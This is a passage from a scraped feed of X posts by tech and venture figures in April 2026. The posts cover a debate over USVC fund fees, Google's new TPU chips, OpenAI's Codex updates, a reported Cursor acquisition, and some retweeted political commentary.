into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://x.com/naval/status/2047645157080658335", + "published_at": "2026-04-24T11:53:43+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them.\n2. A robot-rich future can't be built with AIs that don't understand the physical world and don't anticipate the consequences of their actions. And LLMs really don't.\n3. The future in the cartoon looks pretty dystopian TBH, but even a non-dystopian version will require world models and zero-shot planning abilities.\n4. I rarely wear a suit and absolutely never wear a tie.\n5. I would never ever place a coffee mug on top of a piece equipment.\n6. I hope I'll look this young in 2032.", + "url": "https://x.com/ylecun/status/2047636569767419951", + "published_at": "2026-04-24T11:19:36+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques.\n\nWith @ELLISUnitMadrid.\n\n📍 Madrid 🇪🇸 \n📅 June 8-19th\n⏰ Apply by June 3rd\n🔗 https://cig.fi.upm.es/mlas/", + "url": "https://x.com/ylecun/status/2047624126047670758", + "published_at": "2026-04-24T10:30:09+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabituellement cohérent, mérite une lecture attentive. Il révèle bien plus qu'une opinion sur l'immigration.\n\n▶️ Commençons par l'évidence que tout le monde remarque : ce texte n'a pas été écrit par Donald Trump.\nTrump écrit en majuscules intempestives, en phrases courtes, avec des digressions abruptes et une syntaxe chaotique. Ce texte est long, structuré, argumenté, avec une progression rhétorique délibérée, une introduction, des exemples, une montée en puissance émotionnelle, une conclusion en appel à l'action. C'est la marque de fabrique de Stephen Miller, architecte de la politique migratoire de Trump depuis dix ans, dont l'organisation America First Legal est précisément celle qui a construit les arguments juridiques soumis à la Cour Suprême. \n\nMiller rédige. Trump signe. C'est une mécanique documentée depuis des années.\n\n▶️ Ce qui rend ce texte particulièrement remarquable, c'est son timing et son objectif.\n\nLe 1er avril, Trump a assisté en personne aux plaidoiries de la Cour Suprême sur le droit du sol, la première fois dans l'histoire américaine qu'un président en exercice assiste à des arguments oraux devant la Cour. \n\nLa majorité des juges, y compris ceux nommés par Trump lui-même, ont exprimé un scepticisme marqué.\n\nCe post fleuve publié dans les jours suivants n'est pas une réflexion spontanée. C'est une tentative d'influencer l'opinion publique, et peut-être les juges eux-mêmes, avant que la décision ne tombe en juin. \n\nVenons-en aux affirmations les plus choquantes du texte, point par point.\n\n▶️ \"Nous sommes le seul pays au monde assez stupide pour autoriser le droit du sol.\" C'est factuellement faux. Une trentaine de pays garantissent la citoyenneté aux enfants nés sur leur territoire, dont le Canada, le Mexique, le Brésil et l'Argentine. \n\n▶️ Trump écrit en substance que les Indiens et les Chinois qu'il qualifie de \"gangsters with laptops\", occupent toutes les places dans la tech californienne, que les Blancs n'ont plus leur chance, et que ce n'est plus leur pays. \n\nLes ingénieurs d'origine indienne et chinoise sont les architectes de l'économie technologique américaine, la même économie dont Trump se félicite en permanence. Google, Microsoft, Adobe, IBM, Palo Alto Networks, Arista Networks : autant de géants américains dirigés par des PDG d'origine indienne. \n\nSelon le rapport Stanford HAI 2026, les États-Unis investissent 285 milliards en IA et 80% des chercheurs en IA américains sont nés à l'étranger. Expulser ou décourager ces populations, c'est amputer l'innovation américaine au bénéfice de la Chine, l'adversaire que Trump prétend combattre.\n\n▶️ L'ACLU (American Civil Liberties Union, organisation fondée en 1920 pour défendre les libertés constitutionnelles américaines) est qualifiée \"d'organisation criminelle, la plus dangereuse de l'histoire des États-Unis,\" plus dangereuse que l'Iran. Trump écrit qu'elle \"a fait plus de dégâts à ce pays que l'Iran n'en a jamais fait\" et appelle à la poursuivre sous une loi antimafia. \n\n▶️ \"Le melting pot est terminé. C'est juste une marmite à cash.\" Le melting pot (le creuset en français), est le mythe fondateur de l'identité américaine depuis deux siècles. Lithuaniens, Roumains, Russes, Polonais, Italiens : Trump les cite lui-même comme exemples de bonnes intégrations. Il oublie de mentionner que ces vagues migratoires européennes ont elles aussi été accueillies avec les mêmes discours : les Irlandais traités de sous-humains, les Italiens lynchés, les Polonais moqués pour leur manque de loyauté. L'histoire se répète. Seule la nationalité des boucs émissaires change.\n\n📕 Dans Le Pantin de la Maison Blanche, j'analyse comment Stephen Miller, idéologue de l'immigration ethno-nationaliste depuis vingt ans, utilise Trump comme amplificateur de sa vision du monde. Ce texte en est la démonstration la plus pure.\n\nL'Amérique a été construite par les enfants de ceux que ce texte veut expulser. Jensen Huang, NVIDIA, l'entreprise qui alimente la révolution IA mondiale, est né à Taïwan. Sundar Pichai, Google, est né en Inde. Satya Nadella, Microsoft, est né en Inde. Chacun d'eux est le produit d'une Amérique qui croyait encore à la vertu de ce fameux meltin pot. Ce texte leur dit que cette Amérique est terminée.\n\n📖 Le Pantin de la Maison Blanche → https://www.amazon.fr/dp/B0GPCCMS68/", + "url": "https://x.com/ylecun/status/2047565736382534091", + "published_at": "2026-04-24T06:38:08+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://x.com/naval/status/2047550896670908809", + "published_at": "2026-04-24T05:39:10+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://x.com/naval/status/2047546920747307466", + "published_at": "2026-04-24T05:23:22+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://x.com/liuliu/status/2047527371486658814", + "published_at": "2026-04-24T04:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://x.com/naval/status/2047520212787015748", + "published_at": "2026-04-24T03:37:14+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://x.com/naval/status/2047519250433421604", + "published_at": "2026-04-24T03:33:25+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://x.com/naval/status/2047510419565420779", + "published_at": "2026-04-24T02:58:19+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://x.com/eladgil/status/2047489459378397604", + "published_at": "2026-04-24T01:35:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://x.com/naval/status/2047481012826124516", + "published_at": "2026-04-24T01:01:28+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitorability of their own models.\n\nhttps://alignment.openai.com/monitorability-evals/", + "url": "https://x.com/sama/status/2047473914528563592", + "published_at": "2026-04-24T00:33:16+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。", + "url": "https://x.com/svwang1/status/2047472537488302502", + "published_at": "2026-04-24T00:27:47+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://x.com/naval/status/2047471220451578132", + "published_at": "2026-04-24T00:22:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。", + "url": "https://x.com/svwang1/status/2047470402725921150", + "published_at": "2026-04-24T00:19:18+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://x.com/HarryStebbings/status/2047461264998478113", + "published_at": "2026-04-23T23:43:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://x.com/ylecun/status/2047454244781818205", + "published_at": "2026-04-23T23:15:06+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\n\"I used to think MAUs and WAUs did not matter, now I think they are critical.\n\nIn the AI era, usage is the leading indicator of value.\n\nIf your usage is growing faster than revenue, you are building something people truly want.\" @jasonlk\n\nLove to hear your thoughts on this @joshelman @kirbyman01 @Joshuabrowder @an21m @mignano and how your thoughts on what matters changed?", + "url": "https://x.com/HarryStebbings/status/2047426032840634830", + "published_at": "2026-04-23T21:23:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://x.com/eladgil/status/2047421448449630379", + "published_at": "2026-04-23T21:04:47+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. \n\nThere were next to no signs 20VC was or would be a success. \n\nHe has been a dear friend ever since!", + "url": "https://x.com/HarryStebbings/status/2047413285675290984", + "published_at": "2026-04-23T20:32:21+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://x.com/JeffDean/status/2047408945950802186", + "published_at": "2026-04-23T20:15:06+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://x.com/JeffDean/status/2047407537566495033", + "published_at": "2026-04-23T20:09:30+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://x.com/JeffDean/status/2047405389856297387", + "published_at": "2026-04-23T20:00:58+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://x.com/JeffDean/status/2047403921912873257", + "published_at": "2026-04-23T19:55:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"don't retweet this, don't retweet this, don't retweet this...\"\n\nah fuck it, life imitates art.", + "url": "https://x.com/sama/status/2047403771416940715", + "published_at": "2026-04-23T19:54:32+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work.\n\nLet us know if you'd like to do it at your company!", + "url": "https://x.com/sama/status/2047395562501411058", + "published_at": "2026-04-23T19:21:55+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "embers", + "url": "https://x.com/sama/status/2047392357482639749", + "published_at": "2026-04-23T19:09:11+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up to find completed sweep dashboards and samples, never having touched code or a terminal at all", + "url": "https://x.com/sama/status/2047386955550470245", + "published_at": "2026-04-23T18:47:43+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: New in the Codex app:\n\n- GPT-5.5\n- Browser control\n- Sheets & Slides\n- Docs & PDFs\n- OS-wide dictation\n- Auto-review mode\n\nEnjoy!", + "url": "https://x.com/sama/status/2047381565534322694", + "published_at": "2026-04-23T18:26:18+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️\n\nRead for free or purchase in print ➡️ https://archive.org/details/vanishing-culture-2026", + "url": "https://x.com/ylecun/status/2047378161860776085", + "published_at": "2026-04-23T18:12:46+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://x.com/liuliu/status/2047374234004115719", + "published_at": "2026-04-23T17:57:10+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://x.com/eladgil/status/2047373700643844303", + "published_at": "2026-04-23T17:55:03+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Does the $60BN Cursor Deal Make Sense:\n\n\"It actually makes sense when you look at what each side lacks.\n\nOne has explosive revenue but weak margins due to compute and model costs.\n\nThe other has massive compute and models but no real revenue.\n\nPut them together and it solves both problems.\" @rodriscoll\n\nLove to hear your thoughts on this @levie @ttunguz @matanSF @shaunmmaguire @beffjezos @martin_casado", + "url": "https://x.com/HarryStebbings/status/2047371926335857036", + "published_at": "2026-04-23T17:48:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://x.com/eladgil/status/2047365014500389353", + "published_at": "2026-04-23T17:20:32+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://x.com/eladgil/status/2047364865527075139", + "published_at": "2026-04-23T17:19:56+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "It is a very expensive desire to be a value investor today. \nIt is much easier to be a momentum investor, that is for sure.", + "url": "https://x.com/HarryStebbings/status/2047358263868436791", + "published_at": "2026-04-23T16:53:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://x.com/JeffDean/status/2047339995682529313", + "published_at": "2026-04-23T15:41:07+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://x.com/naval/status/2047334901033123913", + "published_at": "2026-04-23T15:20:52+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear designed to intimidate a journalist for revealing potential abuses, the message is unmistakable: be quiet or be targeted. That’s how fear replaces truth. That’s how a free press is pushed toward silence. And that’s how democracies start to collapse.", + "url": "https://x.com/ylecun/status/2047321581966291154", + "published_at": "2026-04-23T14:27:57+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF\nYoutube 👉 https://youtu.be/s61XVZAt5ns\nApple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acquired-for-%2460bn-by-xai-anthropic-hits/id958230465?i=1000763211245", + "url": "https://x.com/HarryStebbings/status/2047316269465006363", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This is the big f**king deal.\n\nCursor acquired for $60BN by xAI\n\nI sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week:\n\n- Anthropic Hits $1TRN in Secondary Markets\n- Anthropic Launches Claude Code\n- Rippling Hits $1BN in ARR\n- Cerebras Files for IPO\n\nMy notes below:\n\n1. This $60B deal actually makes sense\n\nThe potential $60 billion acquisition of Cursor by xAI/SpaceX is an industrial \"marriage made in heaven\". Cursor has an exploding business with billions in ARR but \"shitty\" gross margins because they lack their own compute and models. Elon Musk has the massive Colossus GPU data center and a model (Grok) but effectively no revenue, making the vertical integration of these two companies a strategic fix for both.\n\n2. How Claude Design Will Hurt Figma\n\nAnthropic’s Claude Design is a full design application, not just a set of prompts or skills. It poses an existential threat because it allows product and engineering teams to bypass the traditional 30-day designer turnaround. By enabling \"normal people\" to design and move into 